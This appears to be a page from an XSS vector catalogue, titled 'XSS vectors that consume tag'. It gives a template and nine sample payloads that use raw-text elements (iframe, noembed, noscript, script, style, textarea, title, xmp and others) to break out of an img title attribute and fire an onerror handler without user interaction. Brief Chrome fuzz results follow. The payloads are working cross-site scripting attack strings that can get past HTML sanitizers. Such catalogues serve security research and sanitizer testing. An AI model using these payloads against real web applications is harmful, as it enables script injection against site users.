XSS vectors that consume tag

Chrome logo 9

This vector shows which events fire without user interaction

Created by: Y4tacker

Created on: Tuesday, November 5, 2024 at 8:04:13 AM

Updated on: Saturday, December 21, 2024 at 12:58:08 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<$[data1]><img title="</$[data1]><img src=x onerror=log('$[data1]')>"></$[data1]>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<iframe><img title="</iframe><img src=x onerror=alert('iframe')>"></iframe>
<noembed><img title="</noembed><img src=x onerror=alert('noembed')>"></noembed>
<noframes><img title="</noframes><img src=x onerror=alert('noframes')>"></noframes>
<noscript><img title="</noscript><img src=x onerror=alert('noscript')>"></noscript>
<script><img title="</script><img src=x onerror=alert('script')>"></script>
<style><img title="</style><img src=x onerror=alert('style')>"></style>
<textarea><img title="</textarea><img src=x onerror=alert('textarea')>"></textarea>
<title><img title="</title><img src=x onerror=alert('title')>"></title>
<xmp><img title="</xmp><img src=x onerror=alert('xmp')>"></xmp>

Fuzz results

Chrome logo
Chrome 129.0.0.0 desktop macOS 10.15.7

Updated

Tue Nov 05 2024
Found 9 results
Loading...